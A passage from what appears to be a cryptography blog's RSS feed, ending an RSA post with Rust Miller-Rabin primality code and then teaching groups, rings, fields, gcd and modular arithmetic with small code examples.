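    assert_eq!(decompose(41), (5, 3)); // 40 = 2^3 * 5
    assert_eq!(decompose(11), (5, 1)); // 10 = 2^1 * 5
}
```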
&lt;p&gt;The core of the Miller-Rabin test is (it yields true if it is probably prime):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn miller_rabin(a: u128, n: u128, d: u128, r: u128) -&amp;gt; bool {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let n_minus_one: u128 = n - 1u128;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let field=FieldPoint::new(a,n);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let mut x = field.power(d);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let mut count: u128 =1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if x.num == 1 || x.num == n_minus_one {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            return true;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        while count &amp;lt; r {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            x = x.power(2u128);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            if x.num == n_minus_one {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                return true;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            count += 1u128;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        false&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If you have a composite number and try several witnesses, it is very likely that it will fail for at least one of them (and the test stops at the first failure), so we can discard the number.&lt;&#x2F;p&gt;
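Putting the pieces together, here is an end-to-end sketch over plain `u128` values rather than the post's `FieldPoint` type; the witnesses for $221=13\times 17$ are classic illustrations of a revealing witness versus a strong liar, and the helper names are our own.

```rust
// Modular exponentiation, assuming n is small enough that n^2 fits in u128.
fn mod_pow(mut base: u128, mut exp: u128, n: u128) -> u128 {
    let mut acc = 1u128;
    base %= n;
    while exp > 0 {
        if exp % 2 == 1 {
            acc = acc * base % n;
        }
        base = base * base % n;
        exp /= 2;
    }
    acc
}

// n - 1 = 2^r * d with d odd.
fn decompose(n: u128) -> (u128, u128) {
    let (mut d, mut r) = (n - 1, 0u128);
    while d % 2 == 0 {
        d /= 2;
        r += 1;
    }
    (d, r)
}

// One round with witness a: true means "probably prime",
// false means "definitely composite".
fn miller_rabin(a: u128, n: u128) -> bool {
    let (d, r) = decompose(n);
    let mut x = mod_pow(a, d, n);
    if x == 1 || x == n - 1 {
        return true;
    }
    for _ in 1..r {
        x = x * x % n;
        if x == n - 1 {
            return true;
        }
    }
    false
}

fn main() {
    // 221 = 13 * 17 is composite; witness 2 exposes it, witness 174 lies.
    assert!(!miller_rabin(2, 221));
    assert!(miller_rabin(174, 221));
    // 101 is prime, so every coprime witness passes.
    assert!([2u128, 3, 5, 7].iter().all(|&a| miller_rabin(a, 101)));
}
```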
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;We covered the basics of RSA and discussed its mathematical foundations. We also went over some of the attacks it may be subjected to, especially when the implementation is not done properly. Finally, we presented some of the basic functions needed to build RSA (such as modular powers, calculating inverses, and checking for primality via the Miller-Rabin test). Even if you could build your own RSA from scratch, it is not advisable, since it could be vulnerable to several attacks (unless it is very well implemented, of course).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;notes&quot;&gt;Notes&lt;&#x2F;h2&gt;
&lt;p&gt;(1) Even if you can code it very fast, there is no guarantee that your implementation is suitable for real-life use. There are several things to check and one should try to follow the standards. Besides, you should know cryptography and understand some of the underlying math.&lt;br &#x2F;&gt;
(2) For security reasons, $p$ and $q$ should have different number of digits (unless you want your system to be vulnerable to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Fermat%27s_factorization_method&quot;&gt;Fermat’s factorization&lt;&#x2F;a&gt;) and the selection should be truly random (careful with pseudorandom generators which are not meant for cryptographic applications, they are part of the recipe for disaster).&lt;br &#x2F;&gt;
(3) If you want something better, compute &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Carmichael_function&quot;&gt;Carmichael’s totient function&lt;&#x2F;a&gt; $\lambda (n)=lcm(q-1,p-1)$, where $lcm$ stands for least common multiple of $q-1$ and $p-1$. Whenever $\phi$ shows up, you can replace it with $\lambda$.&lt;br &#x2F;&gt;
(4) This is the same as saying that $d\times e-1$ is divisible by $\phi(n)$ or $d\times e=k\phi(n)+1$ for some integer $k$. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Euler%27s_theorem&quot;&gt;Euler’s theorem&lt;&#x2F;a&gt; states that $a^{\phi(m)}\equiv 1 \pmod{m}$ if $a$ and $m$ are coprime.&lt;br &#x2F;&gt;
If we take $m=\phi(n)$ and $a=e$ we see that $e\times e^{\phi(\phi(n))-1}\equiv 1 \pmod{\phi(n)}$, so $d=e^{\phi(\phi(n))-1}$, which means that $d$ can be calculated by taking powers of $e$.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Math Survival Kit for Developers</title>
          <pubDate>Fri, 19 Aug 2022 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/math-survival-kit-for-developers/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/math-survival-kit-for-developers/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/math-survival-kit-for-developers/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;When working with cryptographic applications you need to understand some of the underlying math (at least, if you want to do things properly). For example, the RSA cryptographic system (which was one of the earliest methods and most widely adopted, until it lost ground to better methods, such as those based on elliptic curves) works by encrypting a message $M$ (expressed as a number in the range 1,2,3,…$n-1$, with $n$ a large composite number) with a public key $e$ doing the following calculation:&lt;br &#x2F;&gt;
$E(M)=M^e \pmod{n}$&lt;br &#x2F;&gt;
If you want to decrypt the message, you need the private key, $d$ and perform:&lt;br &#x2F;&gt;
$M=E(M)^d \pmod{n}$.&lt;br &#x2F;&gt;
Now, what do all these calculations mean and why does RSA work? The trick relies on Euler’s theorem and the fact that $d$ and $e$ are related by $d\times e \equiv 1 \pmod{\phi(n)}$, so that when we apply $e$ and afterward $d$, “it is the same as” raising the message to the power $1$. Of course, there are quite a few symbols you might not understand, but some key concepts are, in fact, quite straightforward. They are just shrouded in mist by the math jargon, which makes things very easy to state for those who know the meaning, but quite challenging for someone who is not acquainted with it.&lt;&#x2F;p&gt;
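To make the round trip concrete, here is a toy sketch with deliberately tiny, insecure parameters of our own choosing: $p=3$, $q=11$, so $n=33$, $\phi(n)=20$, $e=3$ and $d=7$ (since $3\times 7=21\equiv 1 \pmod{20}$).

```rust
// Modular exponentiation by repeated squaring (toy sizes, no overflow risk).
fn mod_pow(mut base: u64, mut exp: u64, n: u64) -> u64 {
    let mut acc = 1;
    base %= n;
    while exp > 0 {
        if exp % 2 == 1 {
            acc = acc * base % n;
        }
        base = base * base % n;
        exp /= 2;
    }
    acc
}

fn main() {
    let (n, e, d) = (33u64, 3u64, 7u64);
    let m = 4u64; // the message, a number in the range 1..n-1
    let c = mod_pow(m, e, n); // encrypt: E(M) = M^e mod n
    let back = mod_pow(c, d, n); // decrypt: M = E(M)^d mod n
    assert_eq!(back, m);
    println!("M = {m}, E(M) = {c}, decrypted = {back}");
}
```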
&lt;p&gt;Another problem frequently showing up is finding prime numbers (in general, very large numbers, with 100 or more digits) or determining whether a certain number is prime or composite. For example, in zk-SNARKs (zero-knowledge succinct non-interactive arguments of knowledge), one of the key ingredients is the ability to perform (something similar to) homomorphic encryption. This is achieved in practice by pairing two elliptic curves over two sets of numbers, where the total number of elements is the prime $m$, satisfying $m=k\times 2^N+1$, with $k$ an odd number and $N$ a large number. We say that $m$ has large 2-adicity and is expressed in compact form as $m-1\equiv 0 \pmod{2^N}$ or $2^N \mid m-1$ (this is read as $2^N$ divides $m-1$). In RSA, the number $n$ is the product of two large prime numbers, $p$ and $q$, that is, $n=p\times q$. If you choose two primes that are very close to each other, your cryptographic system could be easily broken using &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Fermat%27s_factorization_method&quot;&gt;Fermat’s method to factorize numbers&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;We see, therefore, that we need to understand the math behind it to know which tricks we can apply to solve a problem easily, how to break a cryptographic system or what are the limitations or weaknesses of our own systems. We will be explaining many key ideas of number theory and abstract algebra to help you build the foundations you need to deal with cryptography.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;natural-numbers-integers-rational-real-and-complex-numbers&quot;&gt;Natural numbers, Integers, Rational, Real and Complex numbers.&lt;&#x2F;h2&gt;
&lt;p&gt;Natural numbers are those we use to count objects and were the first things we learned at school: $1,2,3,4…$ are natural numbers. The set (collection) of these numbers is frequently represented by $\mathbb{N}$. Numbers like $-1$, $-2$, $0$, etc, are part of the integers; the set is represented by $\mathbb{Z}$ (from German, &lt;em&gt;zahlen&lt;&#x2F;em&gt; , numbers). Numbers that can be expressed as the ratio of two integers $a$ and $b$ (with $b\neq 0$) are called rational, $r=a&#x2F;b$ and the set is denoted by $\mathbb{Q}$. Rational numbers can be extended with the addition of irrational numbers (such as $\pi$ and $e$) to form the set of real numbers $\mathbb{R}$. You might have also heard of the complex numbers $\mathbb{C}$, which contain numbers such as $i$, where $i^2=-1$.&lt;&#x2F;p&gt;
&lt;p&gt;In the integers, we have the four basic operations: addition, subtraction, multiplication and division. Let’s focus first on addition and subtraction:&lt;br &#x2F;&gt;
1. If we take $a$ and $b$ in $\mathbb{Z}$, then $c=a+b$ and $d=a-b$ are also in $\mathbb{Z}$. We say the sum and subtraction are closed operations on the set.&lt;br &#x2F;&gt;
2. If we add $0$ to any number $a$, we get $a$, that is, $a+0=0+a=a$. $0$ is the additive identity of $\mathbb{Z}$.&lt;br &#x2F;&gt;
3. We know that if we sum $a$ and $-a$ we get $0$. That is, $a+(-a)=a-a=0$, so subtracting is the same as adding $-a$. $-a$ is the additive inverse of $a$.&lt;br &#x2F;&gt;
4. Given $a$, $b$ and $c$, $a+(b+c)=(a+b)+c$. This is the associative property.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;groups&quot;&gt;Groups&lt;&#x2F;h2&gt;
&lt;p&gt;The above properties show that the set of integers $\mathbb{Z}$ with the $+$ operation forms an algebraic group. Other sets, combined with different operations, have the same mathematical structure. For example, positive rational numbers with multiplication have a group structure. $n\times n$ invertible matrices form a group under matrix multiplication. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Vector_space&quot;&gt;Vector spaces&lt;&#x2F;a&gt; form a group under addition (if you take any two vectors $u$ and $v$, their sum is always in the vector space). Elliptic curve cryptography uses the fact that adding two points over an elliptic curve always results in a third point over the curve. Groups appear in many applications in Mathematics, Physics and Chemistry. We can define a group as a (non-empty) set $G$ together with a binary operation (that is, an operation that takes two input elements from the set $G$) $\times$ satisfying:&lt;br &#x2F;&gt;
G1. If $a$ and $b$ are in the set, then $a\times b=c$ is also in the set.&lt;br &#x2F;&gt;
G2. There is an identity element, $e$, such that $e\times a=a\times e=a$.&lt;br &#x2F;&gt;
G3. If $a$ is in the set, there is some $b$ in the set such that $a\times b=e$. We say that $b$ is the inverse of $a$ and denote it $b=a^{-1}$.&lt;br &#x2F;&gt;
G4. For $a,b,c$, $a\times (b\times c)=(a\times b)\times c$.&lt;&#x2F;p&gt;
&lt;p&gt;The notation in groups is sometimes confusing and people can freely use additive (+) or multiplicative ($\times$) notation, and call their identities either $0$ or $1$. This doesn’t matter much, since the binary operation can be quite weird (such as “addition” on elliptic curves). If you can start by looking at things a little bit more abstractly, it will pay off very quickly.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Exercise: Take the space of $n\times n$ matrices, such that their determinant is non-zero (that is, the set of invertible matrices). Show that this is a group.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We also learned at school that addition in the integers is commutative (that is, the order of the factors does not change the result $a+b=b+a$). Not all groups satisfy this condition, though. For those privileged groups, we have the name Abelian (or commutative) group. An Abelian group has an additional condition:&lt;br &#x2F;&gt;
G5. If $a$, $b$ are in $G$, $a\times b = b\times a$.&lt;&#x2F;p&gt;
&lt;p&gt;When we look at multiplication and division in the integers, we see that there are some problems.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. If $a$ and $b$ are integers, $a\times b=c$ is also an integer. The operation is closed under multiplication.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. If we multiply any number by $1$, we get the same number. $1$ is the multiplicative identity.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Given $a,b,c$, we have $a\times (b\times c)=(a\times b)\times c$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Given $a$, $b$ and $c$, $a\times (b+c)=a\times b+a\times c$ and $(b+c)\times a=b\times a+c\times a$. This is the distributive property.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. If $a$ and $b\neq 0$ are integers, their division $a&#x2F;b$ is not necessarily an integer. For example, $a=3$ and $b=2$ results in $c=3&#x2F;2$, which is a rational (not integer) number. In other words, the operation is not closed.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;rings-and-fields&quot;&gt;Rings and fields&lt;&#x2F;h2&gt;
&lt;p&gt;The set $\mathbb{Z}$ together with addition and multiplication forms a ring. The polynomials with ordinary addition and multiplication also form a ring. $n\times n$ matrices also form a ring under addition and multiplication. Formally, a ring is a set $R$ with two operations $+$ and $\times$ such that:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. R is an abelian group under $+$ (that is, R fulfills all the conditions for a group G1 to G4, plus commutativity, G5).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. There is a multiplicative identity $e$, such that $a\times e=e\times a=a$. Frequently, we use $e=1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Multiplication is associative.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. We have the distributive property of multiplication concerning addition.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;em&gt;Exercise: Check that the $n\times n$ matrices form a ring with ordinary matrix addition and multiplication.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;If we look at the rational numbers, for any non-zero element, we have a multiplicative inverse. For example, $1&#x2F;5$ is the multiplicative inverse of $5$, since $5\times 1&#x2F;5=1$. The division is now a closed operation. Besides, multiplication is also commutative. $\mathbb{Q}$ with the ordinary addition and multiplication is a field. Other examples of fields are $\mathbb{R}$ and $\mathbb{C}$. When the number of elements in the set is finite (such as $4$, $2^{255}-19$, etc), the field is known as a finite field. These will be very important for cryptography.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;some-concepts-from-number-theory&quot;&gt;Some concepts from number theory&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;divisibility&quot;&gt;Divisibility&lt;&#x2F;h3&gt;
&lt;p&gt;We will start by talking about divisibility. Given two natural numbers, $a$ and $b$, we say that $a$ divides $b$ (and write it $a\mid b$) if there is another number $c$ such that $a\times c=b$. $a$ is called a divisor of $b$. If $a$ does not divide $b$, we write $a\nmid b$ and we can write $b=q\times a+r$, where $r&amp;lt;a$, with $q$ the quotient and $r$ the remainder of the division. If a prime $p$ divides $b\times c$, then $p\mid b$ or $p\mid c$ (this is Euclid’s lemma; it fails for composite divisors, for example $6\mid 4\times 9$ but $6\nmid 4$ and $6\nmid 9$). Another fact is that if $a\mid b$ and $a\mid c$, then $a\mid (x\times b+y\times c)$ for any numbers $x,y$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;prime-numbers&quot;&gt;Prime Numbers&lt;&#x2F;h3&gt;
&lt;p&gt;A number $p&amp;gt;1$ is called prime if its only divisors are $1$ and itself. Otherwise, the number is composite. Examples of prime numbers are $2,3,5,7,11,13,17,19,23,29,31,…$. The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Fundamental_theorem_of_arithmetic&quot;&gt;fundamental theorem of arithmetic&lt;&#x2F;a&gt; tells us that any number can be expressed in a unique way (up to ordering) as a product of powers of prime numbers. For example, $20=2^2\times 5$, $186=2\times 3\times 31$, $5=5$, etc. Finding prime numbers is crucial for cryptography. One easy way (but by no means practical for large numbers) to see whether a number $p$ is prime or not consists in checking whether it is divisible by any prime number less than or equal to $\sqrt{p}$. The problem is that, if $p$ is very large, this can be pretty inefficient. There are some better and faster algorithms, but we will cover them some other time.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Exercise: Find all prime numbers that are smaller than 100.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;greatest-common-divisor-and-euclid-s-algorithm&quot;&gt;Greatest common divisor and Euclid’s algorithm&lt;&#x2F;h3&gt;
&lt;p&gt;An important concept is that of the greatest common divisor: given two numbers $a$ and $b$ we want to find the largest number $c$ such that $c\mid a$ and $c\mid b$. We denote this by $c=gcd(a,b)$ or simply $c=(a,b)$. For example, $20=2^2\times 5$ and $50=2\times 5^2$. Both numbers are divisible by $1,2,5,10$; $10$ is the greatest number dividing both, and so $gcd(20,50)=10$. Two numbers $a,b$ are called relatively prime (or coprime) if $gcd(a,b)=1$. If $a$ and $b$ are both prime (and different), $1$ is the only common divisor. However, $8$ and $9$ are not prime themselves ($8=2^3$ and $9=3^2$), but their only common divisor is $1$, so they are coprime.&lt;&#x2F;p&gt;
&lt;p&gt;The greatest common divisor satisfies the following equation, for some $x$ and $y$:&lt;br &#x2F;&gt;
$x\times a+y\times b=gcd(a,b)$&lt;br &#x2F;&gt;
The greatest common divisor can be found very efficiently using the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Euclidean_algorithm&quot;&gt;Euclidean algorithm&lt;&#x2F;a&gt; and the numbers $x$ and $y$ can also be found with little extra cost using the extended Euclidean algorithm.&lt;&#x2F;p&gt;
&lt;p&gt;To understand the algorithm, let’s look at an example: say we want to calculate $gcd(2502,864)$. The algorithm takes advantage of the fact that the remainder is always less than the divisor, so we can “chop down” the larger number; this chopping does not affect the greatest common divisor.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Let&amp;#39;s find the remainder of $2502&#x2F;864$, $r_0=774$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Let&amp;#39;s find the remainder of $864&#x2F;774$, $r_1=90$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. The remainder of $774&#x2F;90$ is $r_2=54$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. $r_3=36$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. $r_4=18$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. $r_5=0$, since $36$ is divisible by $18$. So, the greatest common divisor is $18$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We can see, from the factorizations $864=2^5\times 3^3$ and $2502=2\times 3^2\times 139$, that the $gcd$ is equal to $2\times 3^2=18$. The advantage is that we found it in just six steps and we didn’t need to know the factorizations (which, for large numbers, can be really hard to find; as a matter of fact, that hardness is the key to the RSA cryptosystem).&lt;&#x2F;p&gt;
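&lt;p&gt;The “chopping” procedure above translates directly into code. Below is a minimal Python sketch of the extended Euclidean algorithm, which returns the gcd together with the Bézout coefficients $x$ and $y$ (the function name egcd is our own choice, purely for illustration):&lt;&#x2F;p&gt;

```python
def egcd(a, b):
    """Return (g, x, y) with x*a + y*b == g == gcd(a, b)."""
    r0, r1 = a, b              # remainders
    x0, y0 = 1, 0              # invariant: r0 == x0*a + y0*b
    x1, y1 = 0, 1              # invariant: r1 == x1*a + y1*b
    while r1 != 0:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1   # "chop down" the larger number
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return r0, x0, y0

g, x, y = egcd(2502, 864)
print(g)                    # 18, as computed by hand above
print(x * 2502 + y * 864)   # 18 as well: Bezout's identity
```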
&lt;h3 id=&quot;congruences-and-modular-arithmetic&quot;&gt;Congruences and modular arithmetic&lt;&#x2F;h3&gt;
&lt;p&gt;One problem we face with computers is that the numbers we can work with are limited. Besides, in some cases, we are not interested in a number itself, but rather in whether it belongs to a certain class or group. For example, when we bet at roulette, we can choose whether the result will be even or odd. If it is even, then $r=2\times k$, for some $k \in {0,1,2,3…18}$. If it is odd, then $r=2\times k+1$. We notice that if we want to check parity, we only need to look at the remainder, which can take two values in this case: $0$ or $1$. In fact, when we want to check whether a number is even in the computer, we look at the rightmost (least significant) bit and check whether it is zero or not. For the case of $2$, we see that any number $a$ satisfies either:&lt;br &#x2F;&gt;
$a\equiv 0 \pmod{2}$&lt;br &#x2F;&gt;
$a\equiv 1 \pmod{2}$&lt;br &#x2F;&gt;
We say that $a$ is congruent to $0$ (or $1$) modulo $2$. This way, we split all the numbers into two categories: even and odd. We can do the same for any number $p&amp;gt;1$, remembering that the remainder $r$ satisfies $0 \leq r \leq p-1$. This can also be seen as $a\equiv r \pmod{p}$, meaning $p\mid a-r$ or $a=k\times p+r$. This notation was invented by Gauss and is really powerful for studying a lot of complex problems. We can perform the usual operations such as addition and multiplication, but we have to be careful about how things work, given that results will always have to be in the range $0 \leq r \leq p-1$ (as a side note, you could choose a different range of representatives, such as ${-2,-1,0,1,2,…,p-3}$, but it can be confusing and we had better stick to our first choice).&lt;&#x2F;p&gt;
&lt;p&gt;In the case of the sum, we can add them just as regular numbers and, if the result exceeds $p$, take the remainder. For example, let’s take $p=7$, so the elements we have are ${0,1,2,3,4,5,6}$. First, we see that $0$ is an element of the set and that adding it to any number does not change the result. If we add $2$ and $3$ the result is $5$. If we add $5$ and $4$, we get $9$, but&lt;br &#x2F;&gt;
$4+5=9\equiv 2 \pmod{7}$&lt;br &#x2F;&gt;
$2$ is just the remainder of the division of $9$ by $7$. We see that the result stays in the original set. What happens when we add $4$ and $3$?&lt;br &#x2F;&gt;
$4+3=7\equiv 0 \pmod{7}$&lt;br &#x2F;&gt;
We get $0$! That is because $7$ is divisible by itself and the remainder is $0$. We see that $4$ is the additive inverse of $3$ under this arithmetic. Similarly, $1$ and $6$ are each other’s inverses, as are $2$ and $5$. We can recognize that the set ${0,1,2,3,4,5,6}$ with the sum done modulo $7$ is an abelian group. Subtraction can be easily defined as adding the inverse of the number, or just performing ordinary subtraction and then taking the result modulo $p$.&lt;&#x2F;p&gt;
&lt;p&gt;With multiplication we get something similar. For example,&lt;br &#x2F;&gt;
$4\times 5=20\equiv 6 \pmod{7}$.&lt;br &#x2F;&gt;
Taking the modulo operation ensures that we always stay inside the set. We also see that $1$ works as the multiplicative identity since any number multiplied by $1$ stays the same. Let’s look at what happens with $6\times 6$:&lt;br &#x2F;&gt;
$6\times 6=36\equiv 1 \pmod{7}$.&lt;br &#x2F;&gt;
We multiplied $6$ by itself and got $1$! We said before that division $a&#x2F;b$ could be restated as $a\times b^{-1}$, where $b\times b^{-1} = 1 = b^{-1} \times b$. We see that $6$ is its own multiplicative inverse under multiplication modulo $7$. We can also see that:&lt;br &#x2F;&gt;
$3\times 5 = 15\equiv 1 \pmod{7}$&lt;br &#x2F;&gt;
$2\times 4 = 8\equiv 1 \pmod{7}$&lt;br &#x2F;&gt;
So, $3 = 5^{-1}$ and $2 = 4^{-1}$! This can sound weird, but we have to remember that we are working with congruence. We can understand the precise meaning of this by rephrasing. Let’s take the case of $6$ and $6$. There are two numbers $a = q_1\times 7+6$ and $b = q_2\times 7+6$ (because that is what the congruence means). Let’s take the product $a\times b$:&lt;br &#x2F;&gt;
$a\times b = (q_1\times 7+6)\times (q_2\times 7+6)$&lt;br &#x2F;&gt;
Let’s apply the distributive law:&lt;br &#x2F;&gt;
$a\times b = q_1\times q_2 \times 7^2+6\times 7\times (q_1+q_2)+36$&lt;br &#x2F;&gt;
Let’s split this further $36=1+35=1+7\times 5$ and regroup, taking as a common factor $7$:&lt;br &#x2F;&gt;
$a\times b = 7\times (q_1\times q_2\times 7+6\times(q_1+q_2)+5)+1$&lt;br &#x2F;&gt;
The first term is divisible by $7$, so it is congruent to $0$. Or, if we subtract $1$ from $a\times b$, we see that the result is divisible by $7$ (since it is the product of $7$ and an integer).&lt;&#x2F;p&gt;
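&lt;p&gt;Everything we claimed about inverses modulo $7$ can be checked by brute force. A small Python sketch (purely illustrative) that finds the multiplicative inverse of every nonzero element:&lt;&#x2F;p&gt;

```python
p = 7
inverses = {}
for a in range(1, p):
    for b in range(1, p):
        if (a * b) % p == 1:    # b is the multiplicative inverse of a
            inverses[a] = b
print(inverses)  # {1: 1, 2: 4, 3: 5, 4: 2, 5: 3, 6: 6}
```

As claimed in the text, $6$ is its own inverse, while $2$ and $4$, and $3$ and $5$, invert each other.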
&lt;p&gt;We can see that, if $p$ is prime, then the set ${0,1,2,…p-1}$ with addition and multiplication modulo $p$ is a finite field.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;Exercise: Prove that this is indeed a finite field.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;mathbb-z-n-mathbb-z-as-a-group-cyclic-groups&quot;&gt;$\mathbb{Z}&#x2F;n\mathbb{Z}$ as a group. Cyclic groups.&lt;&#x2F;h3&gt;
&lt;p&gt;You will frequently see these sets denoted as $\mathbb{Z}&#x2F;p\mathbb{Z}$. We have to be very careful if we want to work with a composite $n$ in $\mathbb{Z}&#x2F;n\mathbb{Z}$ (in this case, it is not a finite field either). For example, let’s try to solve this equation:&lt;br &#x2F;&gt;
$(x+2)\times(x+1)\equiv 0 \pmod{12}$&lt;br &#x2F;&gt;
We could use our knowledge of math and, when the product of two numbers is $0$, at least one of them is $0$ (spoiler’s alert: this will go wrong):&lt;&#x2F;p&gt;
